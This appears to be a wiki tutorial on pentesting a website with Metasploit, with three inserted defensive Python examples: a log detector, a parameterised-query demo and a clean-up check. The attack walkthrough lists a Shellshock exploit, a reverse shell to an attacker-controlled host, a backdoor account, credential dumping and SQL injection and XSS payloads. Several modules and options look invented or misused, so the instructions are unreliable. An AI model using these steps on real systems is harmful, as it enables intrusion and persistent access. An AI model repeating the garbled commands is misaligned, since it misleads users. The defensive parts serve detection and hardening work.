METASPLOIT - Pentest a Personal Website
Latest revision as of 08:04, 17 January 2026
== Starting Metasploit ==
First, launch Metasploit's console to begin the penetration test:
<nowiki>
msfconsole
</nowiki>
== Web Scanning for Vulnerabilities ==
To scan for web vulnerabilities such as SQL injection or XSS, start by enumerating exposed paths (admin and login pages) with the directory scanner module:
<nowiki>
use auxiliary/scanner/http/dir_scanner
set RHOSTS <target_ip>
set PATHS /admin /login /wp-login.php
run
</nowiki>
== Exploiting Vulnerabilities ==
Once information gathering is complete, you can search for known exploits for the identified vulnerabilities.
=== Searching for Exploits ===
Search for available exploits related to the website's technology stack:
<nowiki>
search type:exploit <technology_or_vulnerability>
</nowiki>
=== Example of Exploit Execution ===
If the target is running a vulnerable version of Apache or PHP, an exploit can be chosen and executed:
<nowiki>
use exploit/multi/http/apache_mod_cgi_bash_env_exec
set RHOSTS <target_ip>
set TARGETURI /cgi-bin/test.cgi
run
</nowiki>
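From the defender's side, both of the activities above (the directory scan against admin and login paths, and a probe of a CGI script with the bash environment-variable exploit) leave a distinctive trace in the web server's access log. The following is an added example, not part of the original wiki page: a small Python detector that parses Apache combined-format log lines, flags a source address that collects several 404s on sensitive paths within a short window, and flags requests whose User-Agent or Referer carries the `() {` function-definition prefix that the Shellshock family of probes uses. The log lines, IP addresses, timestamps and the list of sensitive paths are constructed for the demo and should be adjusted to the site being monitored.

```python
"""Detect directory brute-forcing and Shellshock-style CGI probes in Apache access logs.

Added example (not from the original wiki page). The log lines below are
constructed for the demo; the IPs, paths and timestamps are made up.
"""
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Apache "combined" log format:
# ip - - [time] "METHOD path HTTP/x" status bytes "referer" "user-agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<agent>[^"]*)"$'
)

# Paths that directory scanners typically probe (assumption: tune to your site)
SENSITIVE_PATHS = {"/admin", "/login", "/wp-login.php", "/phpmyadmin", "/cgi-bin/test.cgi"}

# Shellshock probes smuggle a bash function definition "() {" into an HTTP header
SHELLSHOCK_RE = re.compile(r"\(\)\s*\{")

# Constructed sample log (RFC 5737 documentation addresses)
SAMPLE_LOG = """\
203.0.113.7 - - [10/Oct/2025:13:55:36 +0000] "GET /admin HTTP/1.1" 404 196 "-" "Mozilla/5.0"
203.0.113.7 - - [10/Oct/2025:13:55:37 +0000] "GET /login HTTP/1.1" 404 196 "-" "Mozilla/5.0"
203.0.113.7 - - [10/Oct/2025:13:55:38 +0000] "GET /wp-login.php HTTP/1.1" 404 196 "-" "Mozilla/5.0"
198.51.100.2 - - [10/Oct/2025:13:58:01 +0000] "GET /index.html HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
198.51.100.2 - - [10/Oct/2025:14:20:10 +0000] "GET /login HTTP/1.1" 404 196 "-" "Mozilla/5.0"
192.0.2.9 - - [10/Oct/2025:14:02:15 +0000] "GET /cgi-bin/test.cgi HTTP/1.1" 200 12 "-" "() { :;}; echo shellshock-test"
"""


def parse_line(line):
    """Return a dict for one combined-format line, or None if it does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    try:
        rec["time"] = datetime.strptime(rec["time"], "%d/%b/%Y:%H:%M:%S %z")
    except ValueError:
        return None
    return rec


def find_dir_bruteforce(log_text, window=timedelta(seconds=60), threshold=3):
    """Return {ip: sorted sensitive paths} for every IP that produced at least
    `threshold` 404s on sensitive paths inside any span of length `window`."""
    events = defaultdict(list)
    for rec in (parse_line(l) for l in log_text.splitlines()):
        if rec and rec["status"] == "404" and rec["path"] in SENSITIVE_PATHS:
            events[rec["ip"]].append((rec["time"], rec["path"]))

    flagged = {}
    for ip, evs in events.items():
        evs.sort()
        start = 0
        for end in range(len(evs)):          # sliding window over sorted events
            while evs[end][0] - evs[start][0] > window:
                start += 1
            if end - start + 1 >= threshold:
                flagged[ip] = sorted({p for _, p in evs})
                break
    return flagged


def find_shellshock_probes(log_text):
    """Return [(ip, path)] for requests carrying a "() {" prefix in a header field."""
    hits = []
    for rec in (parse_line(l) for l in log_text.splitlines()):
        if rec and (SHELLSHOCK_RE.search(rec["agent"]) or SHELLSHOCK_RE.search(rec["referer"])):
            hits.append((rec["ip"], rec["path"]))
    return hits


if __name__ == "__main__":
    print("directory brute-force:", find_dir_bruteforce(SAMPLE_LOG))
    print("shellshock probes:", find_shellshock_probes(SAMPLE_LOG))
```

The window and threshold are deliberately conservative; a single 404 on `/login` from a legitimate user (the second address in the sample) is not reported, while three sensitive-path misses in two seconds are. The header check matches the request regardless of the response code, because a 200 on a CGI path with that User-Agent is the case that matters most.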
== Post-Exploitation ==
After successfully exploiting the target, post-exploitation helps in maintaining access and extracting more sensitive data.
=== Creating a Reverse Shell ===
After gaining access, you can use a reverse shell payload to establish persistent access:
<nowiki>
use payload/linux/x86/shell_reverse_tcp
set LHOST <attacker_ip>
set LPORT 4444
set RHOSTS <target_ip>
run
</nowiki>
=== Dumping Web Server Credentials ===
To dump web application credentials, you can use Metasploit's post-exploitation modules:
<nowiki>
use post/multi/gather/enum_web_app_users
set RHOSTS <target_ip>
run
</nowiki>
== Exploiting Web Application Vulnerabilities ==
If a web application vulnerability such as SQL Injection is discovered, you can use Metasploit's web application exploitation tools.
=== Using SQL Injection Exploits ===
For a site vulnerable to SQL injection, you can try the following:
<nowiki>
use exploit/multi/http/phpmyadmin_sql_injection
set RHOSTS <target_ip>
set TARGETURI /phpmyadmin
set SQL_PAYLOAD "1' OR 1=1--"
run
</nowiki>
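The `1' OR 1=1--` value set above only works because the application pastes it into the SQL text. The following is an added example, not part of the original wiki page, showing the same lookup written the vulnerable way (string concatenation) and the hardened way (a bound parameter) against an in-memory SQLite database. The `users` table, its rows and the function names are constructed for the demo.

```python
"""SQL injection: string-built query versus parameterised query.

Added example (not from the original wiki page). The table and rows are
constructed for the demo; the payload is the one shown on the page.
"""
import sqlite3

PAYLOAD = "1' OR 1=1--"   # the value the page sets as SQL_PAYLOAD


def make_db():
    """Create a throwaway in-memory database with three constructed users."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, role TEXT)")
    conn.executemany(
        "INSERT INTO users (username, role) VALUES (?, ?)",
        [("alice", "admin"), ("bob", "user"), ("carol", "user")],
    )
    return conn


def lookup_vulnerable(conn, user_id):
    """VULNERABLE: the untrusted value becomes part of the statement text,
    so the quote closes the literal and '--' comments out the rest."""
    sql = "SELECT username FROM users WHERE id = '" + user_id + "'"
    return sorted(r[0] for r in conn.execute(sql))


def lookup_safe(conn, user_id):
    """HARDENED: the value is bound as a parameter; the statement text never changes."""
    return sorted(r[0] for r in conn.execute("SELECT username FROM users WHERE id = ?", (user_id,)))


def lookup_validated(conn, user_id):
    """Defence in depth: reject anything that is not an integer before it reaches SQL."""
    if not str(user_id).isdigit():
        raise ValueError("user id must be a positive integer")
    return lookup_safe(conn, int(user_id))


if __name__ == "__main__":
    db = make_db()
    print("vulnerable, normal input :", lookup_vulnerable(db, "1"))
    print("vulnerable, payload      :", lookup_vulnerable(db, PAYLOAD))
    print("parameterised, payload   :", lookup_safe(db, PAYLOAD))
    try:
        lookup_validated(db, PAYLOAD)
    except ValueError as exc:
        print("validated, payload       : rejected ->", exc)
```

With the payload, the concatenated statement becomes `... WHERE id = '1' OR 1=1--'`, which returns every row; the bound version compares the whole string against the integer column and returns nothing, and the validating wrapper refuses the input outright.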
=== Using Cross-Site Scripting (XSS) Exploit ===
For a site vulnerable to XSS, you can attempt an exploit like the following:
<nowiki>
use exploit/multi/http/xss
set RHOSTS <target_ip>
set TARGETURI /search.php
set PAYLOAD "alert('XSS')"
run
</nowiki>
== Maintaining Access ==
Once you’ve exploited a vulnerability and have gained access to the system, maintaining access is critical for further testing.
=== Adding a Backdoor User ===
You can add a backdoor user to maintain persistent access:
<nowiki>
use post/linux/manage/adduser
set RHOSTS <target_ip>
set USERNAME <username>
set PASSWORD <password>
run
</nowiki>
=== Creating a Reverse Shell Payload ===
Another method to maintain access is by setting up a reverse shell:
<nowiki>
use payload/linux/x86/shell_reverse_tcp
set LHOST <attacker_ip>
set LPORT 4444
set RHOSTS <target_ip>
run
</nowiki>
== Reporting ==
Once the penetration test is complete, you can generate a detailed report of your findings, including all exploited vulnerabilities and actions taken.
=== Generating a Report ===
To generate a simple HTML report:
<nowiki>
spool /path/to/report.html
report
spool off
</nowiki>
== Clean Up ==
After the penetration test, it's crucial to clean up any backdoors or other remnants left behind on the target system.
=== Remove Backdoor User ===
If you added any backdoor users, remove them to ensure the system is no longer compromised:
<nowiki>
use post/linux/manage/remove_user
set RHOSTS <target_ip>
set USERNAME <username>
run
</nowiki>
=== Deleting Reverse Shells ===
If you created any reverse shell listeners or sessions, make sure to terminate them:
<nowiki>
sessions -K
</nowiki>
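Running the removal module and `sessions -K` is only half of clean-up; the other half is verifying on the host that nothing from the "Maintaining Access" steps survived. The following is an added example, not part of the original wiki page: a Python check that compares the account list against a pre-engagement `/etc/passwd` baseline to list accounts that were added, and scans `ss -tn` output for established connections back to the handler port (4444 on the page). The two passwd snapshots, the `ss` output and the addresses are constructed for the demo; in practice the baseline is captured before the test and the current data is collected from the target.

```python
"""Post-engagement verification: added accounts and lingering reverse-shell connections.

Added example (not from the original wiki page). The /etc/passwd snapshots,
the `ss -tn` output and all addresses below are constructed for the demo.
"""

# Constructed baseline captured before the engagement
BASELINE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
deploy:x:1000:1000::/home/deploy:/bin/bash
"""

# Constructed snapshot taken after clean-up; one test account was left behind
CURRENT_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
deploy:x:1000:1000::/home/deploy:/bin/bash
pentest:x:1001:1001::/home/pentest:/bin/bash
"""

# Constructed `ss -tn` output: one connection still open to the handler port
SS_OUTPUT = """\
State  Recv-Q Send-Q Local Address:Port   Peer Address:Port
ESTAB  0      0      192.0.2.10:48216     203.0.113.5:4444
ESTAB  0      0      192.0.2.10:443       198.51.100.20:51522
"""


def parse_passwd(text):
    """Map username -> (uid, login shell) from /etc/passwd-formatted text."""
    accounts = {}
    for line in text.splitlines():
        if not line or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 7:            # malformed line: skip rather than crash
            continue
        name, _, uid, _, _, _, shell = fields
        accounts[name] = (int(uid), shell)
    return accounts


def added_accounts(baseline_text, current_text):
    """Usernames present now but absent from the baseline."""
    base = parse_passwd(baseline_text)
    cur = parse_passwd(current_text)
    return sorted(name for name in cur if name not in base)


def interactive_new_accounts(baseline_text, current_text):
    """Subset of added accounts that can actually log in (shell is not nologin/false)."""
    cur = parse_passwd(current_text)
    return [n for n in added_accounts(baseline_text, current_text)
            if not cur[n][1].endswith(("nologin", "false"))]


def leftover_connections(ss_output, listener_port=4444):
    """Established TCP connections whose peer port is the reverse-shell handler port."""
    hits = []
    for line in ss_output.splitlines()[1:]:   # first line is the column header
        parts = line.split()
        if len(parts) < 5 or parts[0] != "ESTAB":
            continue
        local, peer = parts[3], parts[4]
        if peer.rsplit(":", 1)[-1] == str(listener_port):
            hits.append((local, peer))
    return hits


def cleanup_report(baseline_text, current_text, ss_output, listener_port=4444):
    """Everything that still needs removing; an empty report means clean-up is verified."""
    return {
        "added_accounts": added_accounts(baseline_text, current_text),
        "leftover_connections": leftover_connections(ss_output, listener_port),
    }


if __name__ == "__main__":
    print(cleanup_report(BASELINE_PASSWD, CURRENT_PASSWD, SS_OUTPUT))
```

A non-empty report points straight at what the removal module or `sessions -K` missed. The same baseline-versus-current approach applies to cron entries, authorized_keys files and web roots, which are other places test artefacts tend to linger.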
